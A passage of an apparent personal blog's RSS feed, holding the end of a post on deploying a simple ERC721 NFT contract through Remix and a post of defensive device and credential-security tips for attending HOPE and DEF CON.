&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;        override&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;ERC721&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; ERC721URIStorage&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;        returns&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt; (&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;string&lt;/span&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt; memory&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;    {&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;        return&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;value&quot;&gt; super&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;tokenURI&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;tokenId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;);&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;    }&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;    function&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; supportsInterface&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;bytes4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;important&quot;&gt; interfaceId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;        public&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;        view&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#AF3A03;--shiki-dark:#FE8019&quot; data-token-type=&quot;keyword&quot;&gt;        override&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;ERC721&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt; ERC721Enumerable&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;        returns&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt; (&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;property&quot;&gt;bool&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;    {&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;        return&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;value&quot;&gt; super&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;supportsInterface&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;interfaceId&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;);&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;    }&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Since I’m &lt;em&gt;not&lt;/em&gt; producing NFTs for public consumption, I skipped the parts of the Alchemy walk-through where this code was modified to cap the number of NFTs and make it possible for addresses other than the contract’s owner to call it.&lt;/p&gt;
&lt;p&gt;Up until now, Safari, Light Wallet, and the iPad Pro work swimmingly. Unfortunately, the web-based Ethereum Remix IDE, which is how we’ll deploy the smart contract code above, does &lt;em&gt;not&lt;/em&gt; play well with this setup.  The issue might be Safari, or it might be Light Wallet; I’m not sure, but the behavior of Remix on both iPadOS and macOS is identical: You can compile the smart contract code (though lockdown mode must be disabled for the site), but attempting to deploy the code always results in a mysterious “Transaction Failed” error message.&lt;/p&gt;
&lt;p&gt;Eventually I installed &lt;a href=&quot;https://brave.com/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Brave&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; on my MacBook for the sole purpose of being able to deploy the smart contract code. &lt;a href=&quot;https://brave.com/wallet/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Brave’s built-in wallet&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; works perfectly with Remix.&lt;/p&gt;
&lt;p&gt;You’ll want to note down the version of Solidity you used to compile the smart contract, the wallet address you used to deploy it, and the smart contract’s address on the blockchain. With this information, you can always return to remix, recompile the smart contract code, connect the controlling wallet, and then reconnect to the smart contract to mint additional NFTs.&lt;/p&gt;
&lt;p&gt;Once the contract was deployed, the only other stumbling block I ran into was that it’s not obvious that the safeMint function requires &lt;em&gt;two&lt;/em&gt; arguments - the first is the address to send the NFT to, and the second is the metadata URI. You can use the chevron next to the function name in Remix to expand both arguments into separate fields, which makes it more obvious how to enter in the necessary information.&lt;/p&gt;
&lt;p&gt;The tokenURI function is also useful: When called with the token ID (an incrementing integer, starting at 0), it will return the metadata URI for the corresponding NFT.&lt;/p&gt;
&lt;p&gt;The minted NFTs took a looooong time to show up in &lt;a href=&quot;https://metamask.io&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;MetaMask&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, but they did show up in &lt;a href=&quot;https://opensea.io&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;OpenSea&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; pretty much immediately. You can use the OpenSea interface to transfer the minted NFTs to other accounts.&lt;/p&gt;
&lt;p&gt;It’s worth noting here that viewing and transferring any NFTs you mint works fine on Safari + Light Wallet. It’s &lt;em&gt;only&lt;/em&gt; the Remix IDE that doesn’t like that setup, and in fact it’s &lt;em&gt;only&lt;/em&gt; deploying and interacting with your contract that’s broken. Everything else in this process can be done using iPadOS. Hopefully this situation will improve over time.&lt;/p&gt; ]]></description>
    <pubDate>Sun, 27 Nov 2022 00:00:00 GMT</pubDate>
  </item><item>
    <title>Notes from HOPE and DEF CON</title>
    <link>https://remarks.delphi-strategy.com/essays/2022-08-15</link>
    <guid>https://remarks.delphi-strategy.com/essays/2022-08-15</guid>
    <description><![CDATA[ &lt;h1 id=&quot;notes-from-hope-and-def-con&quot;&gt;Notes from HOPE and DEF CON&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#notes-from-hope-and-def-con&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;Now that both &lt;a href=&quot;https://xiv.hope.net/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;HOPE&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and &lt;a href=&quot;https://defcon.org/html/defcon-30/dc-30-index.html&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;DEF CON&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; are behind me, I want to summarize some of my initial thoughts. This is not a “what did I learn about hacking” post, but rather musings about &lt;em&gt;attending&lt;/em&gt; these events.&lt;/p&gt;
&lt;h2 id=&quot;device-security&quot;&gt;Device security&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#device-security&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The internet is awash with advice to only bring burner phones/laptops to DEF CON (or hacker conferences in general), to assume any credit card you use while attending (or even being near) DEF CON is compromised, etc.&lt;/p&gt;
&lt;p&gt;After much consideration, I’ve come to believe that much of this “advice” is ill-conceived, and shows either the advice-giver’s poor risk modeling abilities or inflated sense of their own importance. &lt;a href=&quot;https://blog.erratasec.com/2019/08/securing-devices-for-defcon.html&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Rob Graham’s advice&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; is much better: Encrypt your stuff and be careful about Wi-Fi and Bluetooth, and you’ll almost certainly be fine.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Assuming that you’re using up-to-date devices&lt;/em&gt;, the main risks of going to a hacker conference are the same as any sort of travel: Theft, assault, abuse by the local authorities. I’m not the kind of person who needs to worry as much about the second two of these, so theft is my main concern. Here’s my general travel setup, which I think is also pretty solid for hacker conferences:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I &lt;em&gt;don’t&lt;/em&gt; take my regular computer with me. I travel with a recent &lt;a href=&quot;https://www.apple.com/ipad-pro/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;iPad Pro&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and &lt;a href=&quot;https://www.apple.com/iphone/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;iPhone&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, and also bring along a &lt;a href=&quot;https://www.raspberrypi.com/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Raspberry Pi&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; (currently a 4B running &lt;a href=&quot;https://www.kali.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Kali Linux&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;) in case I need tools I can’t run on the iPad (this is actually less common than you’d think).&lt;/li&gt;
&lt;li&gt;All of my devices are encrypted.&lt;/li&gt;
&lt;li&gt;I use Face ID on my iPad Pro and iPhone, but &lt;em&gt;not&lt;/em&gt; for the lock screen. A strong passcode or PIN is required for initial device access - I think of Face ID as an extra layer of security for individual apps rather than what provides the actual &lt;em&gt;device&lt;/em&gt; security.&lt;/li&gt;
&lt;li&gt;I run a minimal-ish set of applications, and regularly review and uninstall anything I’m not currently using.&lt;/li&gt;
&lt;li&gt;Before leaving (generally the morning I head for the airport, unless i have a &lt;em&gt;really&lt;/em&gt; early flight), I make sure that all of my devices are running the most up-to-date versions of their operating systems and apps, and run a complete backup.&lt;/li&gt;
&lt;li&gt;I have &lt;a href=&quot;https://www.apple.com/icloud/find-my/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Find My&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; active on all of my devices so if the device is stolen I can lock/wipe it remotely.&lt;/li&gt;
&lt;li&gt;Finally, I use &lt;a href=&quot;https://protonvpn.com/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Proton VPN&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; on all my devices. I do this not for “privacy” reasons, but because using a VPN is a way to ensure that any applications that are &lt;em&gt;not&lt;/em&gt; using encrypted connections or are vulnerable to downgrade attacks have an extra layer of protection. That Proton VPN also provides some on-the-wire malware blocking is an added bonus.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now, hacker conferences &lt;em&gt;do&lt;/em&gt; generally have a more hostile radio frequency environment, so I do take extra care here.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I turn off Bluetooth and leave it off attending the conference. Since I only travel with wired headphones, this isn’t a big hardship for me. The only time I turn on Bluetooth is if I want to edit any photography (I have an &lt;a href=&quot;https://www.apple.com/apple-pencil/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Apple Pencil&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; for my iPad), but I only do this when away from the conference area.&lt;/li&gt;
&lt;li&gt;I remove all Wi-Fi networks from my devices (which means deleting them from iCloud Keychain). For DEF CON, I configure &lt;a href=&quot;https://wifireg.defcon.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;the secure conference Wi-Fi&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; before leaving. That said, I keep Wi-Fi turned off on my devices as well unless I absolutely need it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Finally, you want to be careful what you’re plugging into your devices. Personally, I bring my own cables and charger, and don’t use anything provided by another conference attendee or plug in any devices (for example, USB drives) that I didn’t bring with me.&lt;/p&gt;
&lt;p&gt;There’s not some kind of magical “hacker miasma” at these conferences that puts your device at risk - someone looking to compromise your device needs to be able to get data to it. By limiting connections to radio networks and avoiding untrusted devices, the opportunity for an attack is severely curtailed (though it cannot be eliminated). The main risk here is someone attempting to subvert a trusted connection (the DEF CON secure Wi-Fi network, the Bluetooth connection to my Apple Pencil, or the cellular radio on my iPhone); the best defense is simply keeping your shit up-to-date and pre-configure trusted connections. It’s very unlikely that someone is going to burn a cellular zero day on you at a hacker conference.&lt;/p&gt;
&lt;p&gt;If your risk model is that a nation state is gunning for you, then you need to be worrying about a lot more than just conference security! Needless to say, this guide is not, then, for you.&lt;/p&gt;
&lt;h3 id=&quot;a-note-about-credential-management&quot;&gt;A note about credential management&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#a-note-about-credential-management&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;An important layer of defense at hacker conferences, when traveling, or just &lt;em&gt;in life&lt;/em&gt; is good credential management.&lt;/p&gt;
&lt;p&gt;I use different usernames/emails for almost every service. Both &lt;a href=&quot;https://proton.me/support/catch-all&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Proton Mail&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and &lt;a href=&quot;https://support.google.com/a/answer/2685650&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Google Workspace&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; can be configured with catch-all email addresses. If you don’t want to pay money, then sign up for Gmail and liberally use &lt;a href=&quot;https://support.google.com/a/users/answer/9308648&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;the &lt;code&gt;+&lt;/code&gt; functionality&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Use unique, random passwords for as many services as you can. Use a password manager (&lt;a href=&quot;https://keepassxc.org&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;KeePassXC&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and compatible applications are good choices) to make this easy to manage. Don’t store these credentials in your browser or system keychain.&lt;/p&gt;
